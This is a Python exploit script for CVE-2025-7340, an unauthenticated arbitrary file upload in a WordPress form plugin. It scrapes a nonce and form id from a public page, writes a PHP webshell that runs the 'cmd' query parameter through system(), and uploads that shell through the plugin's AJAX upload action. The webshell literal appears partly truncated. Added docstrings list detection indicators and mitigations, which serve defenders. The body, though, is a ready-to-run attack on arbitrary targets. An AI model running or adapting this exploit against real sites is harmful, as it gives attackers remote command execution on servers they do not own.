import re
import requests
import argparse
import time
from colorama import init, Fore, Style

# By : Nxploited (Khaled_alenazi)
# colorama is initialised with autoreset so each print returns to the default colour.
init(autoreset=True)


class Nxploited:
    """Proof-of-concept client for CVE-2025-7340 (the CVE id comes from the CLI description in main()).

    The flow visible in this file is: fetch a public page without credentials,
    scrape a nonce, an AJAX URL and a form id from it, then send a multipart
    POST that uploads a file named shell.php through the
    ``ht_form_temp_file_upload`` action. No login step is performed.

    Defender notes, all taken from values in this file:
      * Request indicator: multipart POST to the site's AJAX endpoint with
        ``action=ht_form_temp_file_upload``, a ``_wpnonce`` field, a
        ``form_id`` field and a file part named ``ht_form_file`` whose
        filename ends in ``.php`` with content type ``application/x-php``.
      * File indicator: new files under ``wp-content/uploads/ht_form/temp/``.
      * Follow-on indicator: requests to files in that directory that carry a
        ``cmd`` query parameter.
      * Client indicator: the fixed User-Agent string set in __init__.
      * Mitigation: apply the vendor fix referenced by the CVE-2025-7340
        advisory, and configure the web server so scripts inside the uploads
        tree are never executed.
    """

    def __init__(self, target_url):
        """Store the base URL and build the HTTP session used for every request."""
        # A trailing slash is stripped from the supplied URL.
        self.target_url = target_url.rstrip("/")
        self.session = requests.Session()
        # TLS certificate verification is disabled for the whole session and the
        # urllib3 warning that would normally report this is silenced.
        self.session.verify = False
        requests.packages.urllib3.disable_warnings()
        # Fixed browser-like User-Agent; the literal is constant across runs, so it
        # can be searched for in access logs.
        self.session.headers.update({
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome Safari"
        })
        # Filled in later by extract_parameters().
        self.nonce = None
        self.ajax_url = None
        self.form_id = None

    def run(self):
        """Run the four stages in order: fetch, extract, write payload, upload."""
        print(Fore.CYAN + "Starting exploit against target...")
        # The sleeps in this class only pace the console output.
        time.sleep(1)
        self.fetch_target_page()
        self.extract_parameters()
        self.generate_shell()
        self.upload_shell()

    def fetch_target_page(self):
        """GET the target URL and keep the response body in self.page_content.

        Raises:
            Exception: if the HTTP status is anything other than 200.
        """
        print(Fore.YELLOW + "Fetching target page...")
        response = self.session.get(self.target_url)
        if response.status_code != 200:
            raise Exception("Failed to fetch target page")
        # page_content is first assigned here, not in __init__.
        self.page_content = response.text

    def extract_parameters(self):
        """Scrape nonce, AJAX URL and form id from the fetched page and print them.

        Raises:
            Exception: if any of the three values could not be found.
        """
        print(Fore.YELLOW + "Extracting parameters...")
        time.sleep(0.8)
        self.nonce = self.extract_nonce()
        self.ajax_url = self.extract_ajax_url()
        self.form_id = self.extract_form_id()
        self.print_info("Extracted Nonce", self.nonce, Fore.GREEN)
        time.sleep(0.3)
        self.print_info("AJAX Endpoint", self.ajax_url, Fore.GREEN)
        time.sleep(0.3)
        self.print_info("Form ID", self.form_id, Fore.GREEN)
        # The values are printed before this check, so a missing one shows as "None".
        if not all([self.nonce, self.ajax_url, self.form_id]):
            raise Exception("Missing required parameters")

    def extract_nonce(self):
        """Return the first lowercase-hex value found after a "nonce" key, or None."""
        # The nonce is read from the page body that was fetched without credentials.
        match = re.search(r'"nonce":"([a-f0-9]+)"', self.page_content)
        return match.group(1) if match else None

    def extract_ajax_url(self):
        """Return the first http(s) URL found after an "ajaxurl" key, or None."""
        match = re.search(r'"ajaxurl":"(http[^"]+)"', self.page_content)
        # Escaped slashes in the captured text are turned back into plain "/".
        return match.group(1).replace("\\/", "/") if match else None

    def extract_form_id(self):
        """Return the digits captured after ``data-form-id=``, or None."""
        # Pattern reproduced exactly as it appears on the page. As written it
        # requires one or more literal "]" characters directly before the attribute.
        match = re.search(r']+data-form-id=["\']?(\d+)', self.page_content)
        return match.group(1) if match else None

    def generate_shell(self):
        """Write the payload text to shell.php in the current working directory."""
        print(Fore.YELLOW + "Generating webshell...")
        # The literal is reproduced exactly as it appears on the page. It contains PHP
        # that passes the `cmd` query parameter to system(), i.e. a command-execution
        # webshell; see the class docstring for the matching indicators.
        shell_code = """"; 
if(isset($_GET['cmd'])) { echo "
";
    system($_GET['cmd']);
    echo "
"; } ?>"""
        with open("shell.php", "w") as f:
            f.write(shell_code)

    def upload_shell(self):
        """POST shell.php to the scraped AJAX URL and report the server's answer."""
        print(Fore.YELLOW + "Uploading shell, please wait...")
        time.sleep(1)
        # Every entry goes out as a multipart part. The (None, value) tuples are
        # plain form fields; only "ht_form_file" carries a filename and content type.
        files = {
            "action": (None, "ht_form_temp_file_upload"),
            "_wpnonce": (None, self.nonce),
            "form_id": (None, self.form_id),
            "ht_form_file": ("shell.php", open("shell.php", "rb"), "application/x-php")
        }
        response = self.session.post(self.ajax_url, files=files)
        # The response is parsed as JSON with no status-code check first.
        result = response.json()
        if result.get("success"):
            # file_id comes from the server's response; the path printed below is
            # relative and is not joined with target_url.
            file_id = result["data"].get("file_id", "")
            shell_path = f"wp-content/uploads/ht_form/temp/{file_id}"
            print(Fore.GREEN + Style.BRIGHT + "\n[+] Exploit Successfully!\n")
            Nxploited.print_info("Go to", shell_path, Fore.MAGENTA + Style.BRIGHT)
            print(Fore.CYAN + "\nExploit by: Khaled Alenazi (Nxploited) - GitHub: https://github.com/Nxploited\n")
        else:
            print(Fore.RED + "Upload failed or unexpected response")

    @staticmethod
    def print_info(label, value, color=Fore.WHITE):
        """Print ``label: value`` prefixed with the given colorama colour code."""
        print(f"{color}{label}: {value}")


def main():
    """Parse the required -u/--url argument and run the class against that URL."""
    parser = argparse.ArgumentParser(
        description="Exploit for CVE-2025-7340 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)"
    )
    parser.add_argument("-u", "--url", required=True, help="Target URL e.g http(s)://target.com")
    args = parser.parse_args()
    exploit = Nxploited(args.url)
    try:
        exploit.run()
    except Exception as e:
        # Any failure in any stage is reduced to a single printed line.
        print(Fore.RED + f"Error: {e}")


if __name__ == "__main__":
    main()